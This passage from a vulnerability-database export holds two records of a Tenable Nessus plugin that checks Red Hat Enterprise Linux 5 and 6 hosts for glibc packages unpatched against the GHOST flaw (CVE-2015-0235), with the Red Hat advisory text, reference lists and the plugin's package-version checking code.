"p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 11, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4033bbaec8ad559d4a05dce876a55d43df3780707feb91f697b172119e1b957d", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "ada315379c9f000e2e48a8928e6b3ddd", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "474125cf5a862fc9b9ffbcfbe9b44ef8", "key": "modified"}, {"hash": "d459846fc4189fab17e65d683fe5fd76", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-12-28T02:19:49", "modified": "2018-12-27T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/12/27 10:05:36\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 11, "lastseen": "2018-12-28T02:19:49"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-01-16T20:20:46", "references": [{"idList": ["ALAS-2015-473", "ALAS-2015-493"], "type": "amazon"}, {"idList": ["ICSA-15-064-01A"], "type": "ics"}, {"idList": ["THN:ACBFC80659E47A5B7C81B99570749679", "THN:3DD8F9ADFFEB290F33825414D41B0F41", "THN:A649F4ABCE9B99052139693A13D95B14"], "type": "thn"}, {"idList": ["VU:967332"], "type": "cert"}, {"idList": ["MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF", "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER"], "type": "metasploit"}, {"idList": ["SOL16057", "F5:K16057"], "type": "f5"}, {"idList": ["0765DE84-A6C1-11E4-A0C1-C485083CA99C", "F7A9E415-BDCA-11E4-970C-000C292EE6B8"], "type": "freebsd"}, {"idList": ["OPENVAS:1361412562310871307", "OPENVAS:1361412562310123196", "OPENVAS:1361412562310120286", "OPENVAS:1361412562310850839", "OPENVAS:1361412562310850633", "OPENVAS:1361412562310105188", "OPENVAS:1361412562310882109", "OPENVAS:1361412562310123197", "OPENVAS:1361412562310882108", "OPENVAS:1361412562310882107"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2015:0184-1", "OPENSUSE-SU-2015:0162-1", "SUSE-SU-2015:0158-1"], "type": "suse"}, {"idList": ["PACKETSTORM:130171", "PACKETSTORM:130974", "PACKETSTORM:130115"], "type": "packetstorm"}, {"idList": ["USN-2485-1"], "type": "ubuntu"}, {"idList": ["SSV:89237"], "type": "seebug"}, {"idList": ["VULNERLAB:1430"], "type": "vulnerlab"}, {"idList": ["SSA-2015-028-01"], "type": "slackware"}, {"idList": ["CISCO-SA-20150128-GHOST"], "type": "cisco"}, {"idList": ["REDHAT-RHSA-2015-0092.NASL", "ORACLELINUX_ELSA-2015-0090.NASL", "REDHAT-RHSA-2015-0090.NASL", "ORACLELINUX_ELSA-2015-0092.NASL", "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "SLACKWARE_SSA_2015-028-01.NASL", "F5_BIGIP_SOL16057.NASL", "ALA_ALAS-2015-473.NASL", "MANDRIVA_MDVSA-2015-039.NASL", "CISCO_CUCM_CSCUS66650-GHOST.NASL"], "type": "nessus"}, {"idList": ["RHSA-2015:0092", "RHSA-2015:0101", "RHSA-2015:0090", "RHSA-2015:0099"], "type": "redhat"}, {"idList": ["EDB-ID:36421", "EDB-ID:35951"], "type": "exploitdb"}, {"idList": ["CESA-2015:0092", "CESA-2015:0090"], "type": "centos"}, {"idList": ["SECURITYVULNS:VULN:14240", "SECURITYVULNS:DOC:31672"], "type": "securityvulns"}, {"idList": ["ELSA-2015-0090", "ELSA-2015-1627", "ELSA-2015-0101"], "type": "oraclelinux"}, {"idList": ["LENOVO:PS500043-NOSID"], "type": "lenovo"}, {"idList": ["1337DAY-ID-23215", "1337DAY-ID-23392"], "type": "zdt"}, {"idList": ["THREATPOST:3A858BD40E6943BD3F4553301036091D", "THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8"], "type": "threatpost"}, {"idList": ["PAN-SA-2015-0002"], "type": "paloalto"}, {"idList": ["DEBIAN:DLA-139-1:5734D"], "type": "debian"}, {"idList": ["CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2"], "type": "cloudfoundry"}, {"idList": ["CVE-2015-0235"], "type": "cve"}, {"idList": ["HUAWEI-SA-20150226-01-GLIBC"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "f471b6c75c7920eb3de6c9b0dab2f5566fa60ccf55130171d76ca32ce70f9b81", "hashmap": [{"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "ada315379c9f000e2e48a8928e6b3ddd", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "474125cf5a862fc9b9ffbcfbe9b44ef8", "key": "modified"}, {"hash": "d459846fc4189fab17e65d683fe5fd76", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "841f8b9079317dced89d78bd76e61136", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2019-01-16T20:20:46", "modified": "2018-12-27T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory 